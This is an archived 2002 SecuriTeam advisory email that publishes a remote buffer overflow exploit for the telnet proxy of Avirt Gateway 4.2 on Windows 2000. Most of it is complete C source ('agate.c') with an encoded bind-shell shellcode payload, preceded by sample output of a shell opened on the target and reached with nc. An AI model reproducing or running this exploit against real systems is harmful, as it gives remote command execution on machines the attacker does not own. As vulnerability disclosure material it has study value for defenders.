[EXPL] Avirt Gateway Remote Buffer Overflow Proof of Concept

From: support@securiteam.com
Date: 02/16/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sat, 16 Feb 2002 00:01:58 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Avirt Gateway Remote Buffer Overflow Proof of Concept
------------------------------------------------------------------------

SUMMARY

The telnet proxy of the Avirt Gateway v4.2 is vulnerable to a remotely
exploitable buffer overflow that allows execution of arbitrary code.
Entering a String of about 510 bytes at the "Ready>" prompt will overwrite
EIP. Exploit will bind a shell to a specified port on the attacked host.

DETAILS

Vulnerable systems:
Avirt Gateway v4.2 [build 4807] on Windows 2000, SP2

Example:
$ agate 10.0.0.1 7007

Avirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)

initialising socket
..initialized
trying to connect
..connected
(waiting)
sending exploit
..sent
(waiting)
..closed
shell bound to port 7007
$ nc -v target 7007
target [10.0.0.1] 7007 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>

Exploit code:
----------------------------------------------------------------------------cut-----------------------------------------------------------------------------
/* agate.c by uid0x00
  * Avirt Gateway 4.2 remote exploit
  * compile with gcc agate.c -o agate
  *
  * tested with win2k, sp2
  *
  * thx to ByteRage, exploit is based on his shellcode
  */

/* Set the following three defines according to the DLL we use */

// MSVCRT.DLL version 6.10.8924.0 (win2K)
#define LoadLibraryRefNEG "\x30\xCF\xFC\x87"
#define GetProcAddressRefADD "\xFC"
#define newEIP "\x60\x32\xFA\x74" // Should JMP/CALL EBX

#include <stdio.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
   int s;
   struct sockaddr_in SockAdr;
   char exploit[1024];
   unsigned short int a_port;

   char shellcode[] =

/* ==== SHELLC0DE START ==== */
/* shellcode based on ByteRage's 450byte code (thx for your help man!) */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x06\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xEB\x06\x90\x90"newEIP"\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE8\xFF\xFF\xFF\xFF"
"\xC0\x5E\xAC\x84\xC0\x75\xFB\x8B\xFE\x33\xC9\xB1\xC1\x4E\x80\x36\x99\xE2\xFA\xBB"LoadLibraryRefNEG
"\xF7\xDB\x56\xFF\x13\x95\xAC\x84\xC0\x75\xFB\x56\x55\xFF\x53"GetProcAddressRefADD"\xAB\xAC"
"\x84\xC0\x75\xFB\xAC\x3C\x21\x74\xE7\x72\x03\x4E\xEB\xEB\x33\xED\x55\x6A\x01\x6A\x02\xFF"
"\x57\xE8\x93\x6A\x10\x56\x53\xFF\x57\xEC\x6A\x02\x53\xFF\x57\xF0\x33\xC0\x57\x50\xB0\x0C"
"\xAB\x58\xAB\x40\xAB\x5F\x55\x57\x56\xAD\x56\xFF\x57\xC0\x55\x57\xAD\x56\xAD\x56\xFF\x57"
"\xC0\xB0\x44\x89\x07\x57\xFF\x57\xC4\x8B\x46\xF4\x89\x47\x3C\x89\x47\x40\xAD\x89\x47\x38"
"\x33\xC0\x89\x47\x30\x66\xB8\x01\x01\x89\x47\x2C\x57\x57\x55\x55\x55\x6A\x01\x55\x55\x56"
"\x55\xFF\x57\xC8\xFF\x76\xF0\xFF\x57\xCC\xFF\x76\xFC\xFF\x57\xCC\x55\x55\x53\xFF\x57\xF4"
"\x93\x33\xC0\xB4\x04\x50\x6A\x40\xFF\x57\xD4\x96\x6A\x50\xFF\x57\xE0\x8B\xCD\xB5\x04\x55"
"\x55\x57\x51\x56\xFF\x77\xAF\xFF\x57\xD0\x8B\x0F\xE3\x18\x55\x57\x51\x56\xFF\x77\xAF\xFF"
"\x57\xDC\x0B\xC0\x74\x21\x55\xFF\x37\x56\x53\xFF\x57\xF8\xEB\xD0\x33\xC0\x50\xB4\x04\x50"
"\x56\x53\xFF\x57\xFC\x55\x57\x50\x56\xFF\x77\xB3\xFF\x57\xD8\xEB\xB9\xFF\x57\xE4\xD2\xDC"
"\xCB\xD7\xDC\xD5\xAA\xAB\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xF0\xE9\xFC\x99\xDE\xFC\xED\xCA"
"\xED\xF8\xEB\xED\xEC\xE9\xD0\xF7\xFF\xF6\xD8\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA"
"\xFC\xEA\xEA\xD8\x99\xDA\xF5\xF6\xEA\xFC\xD1\xF8\xF7\xFD\xF5\xFC\x99\xC9\xFC\xFC\xF2\xD7"
"\xF8\xF4\xFC\xFD\xC9\xF0\xE9\xFC\x99\xDE\xF5\xF6\xFB\xF8\xF5\xD8\xF5\xF5\xF6\xFA\x99\xCE"
"\xEB\xF0\xED\xFC\xDF\xF0\xF5\xFC\x99\xCB\xFC\xF8\xFD\xDF\xF0\xF5\xFC\x99\xCA\xF5\xFC\xFC"
"\xE9\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xB8\xCE\xCA\xD6\xDA\xD2\xAA\xAB"
"\x99\xEA\xF6\xFA\xF2\xFC\xED\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA"
"\xFA\xFC\xE9\xED\x99\xEA\xFC\xF7\xFD\x99\xEB\xFC\xFA\xEF\x99\x99\x9B\x99\x82\xA1\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xFA\xF4\xFD\x99\x0D\x0A";

/* ==== SHELLC0DE ENDS ==== */

   printf("\nAvirt Gateway 4.2 remote exploit by uid0x00
(uid0x00@haked.com)\n\n");

   if(argc < 3) {
     printf("usage:\t%s <ip#> <port#>\n", argv[0]);
     return 0;
   }

   //insert shell port
   a_port = htons(atoi(argv[2]));
   a_port^= 0x9999;
   shellcode[964] = (a_port) & 0xff;
   shellcode[965] = (a_port >> 8) & 0xff;

   //init the exploit buffer
   memset(&exploit, '\xCC', 0x200);
   memcpy(&exploit, &shellcode, sizeof(shellcode)-1);

   printf("initialising socket\n");
   s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
   if (s) {
     printf("...initialized\n");

     memset(&SockAdr, 0, sizeof(SockAdr));
     SockAdr.sin_addr.s_addr = inet_addr(argv[1]);
     SockAdr.sin_family = AF_INET;
     SockAdr.sin_port = htons(23);

     printf("trying to connect\n");
     if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr))) {
       printf("...connected\n");
       printf("(waiting)\n");
       sleep(3);

       printf("sending exploit\n");
       send(s, exploit, sizeof(exploit), 0);
       printf("...sent\n");

       printf("(waiting)\n");
       sleep(3);

       printf("...closed\nshell bound to port %s \n", argv[2]);
       close(s);
     }
     else {
       printf("... failed :( errno = %i\n", errno);
       close(s);
       return(0);
     }
   }
}
----------------------------------------------------------------------------cut-----------------------------------------------------------------------------

ADDITIONAL INFORMATION

The information has been provided by <mailto:uid0x00@haked.com> uid0x00.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [TOOL] ZyXel Telnet Service Password Brute Forcer
    ... int main ... void USAGE() ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [TOOL] High-speed Brute-force Password Cracker for MySQL
    ... The MySQL password hash function could be strengthened considerably ... int i, len; ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [TOOL] Toby, a Linux Syscalls Loadable Kernel Module Interceptor
    ... int toby_setreuid ... int toby_setresuid(uid_t ruid, uid_t euid, uid_t suid) ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] Apache & PHP Proof of Concept Exploit
    ... PHP supports multipart/form-data POST requests ... int main ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [Full-Disclosure] DameWare Mini Remote Control < v3.73 remote exploit by kralor
    ... /* In comments there's some information about offsets for jmp esp on diff ... win2k fr adv srv sp2 ... void print_packet(char *buffer, int begin, int end) ... void set_sc(int os, int sp, char *rhost, int rport, char *shellc0de) ...
    (Full-Disclosure)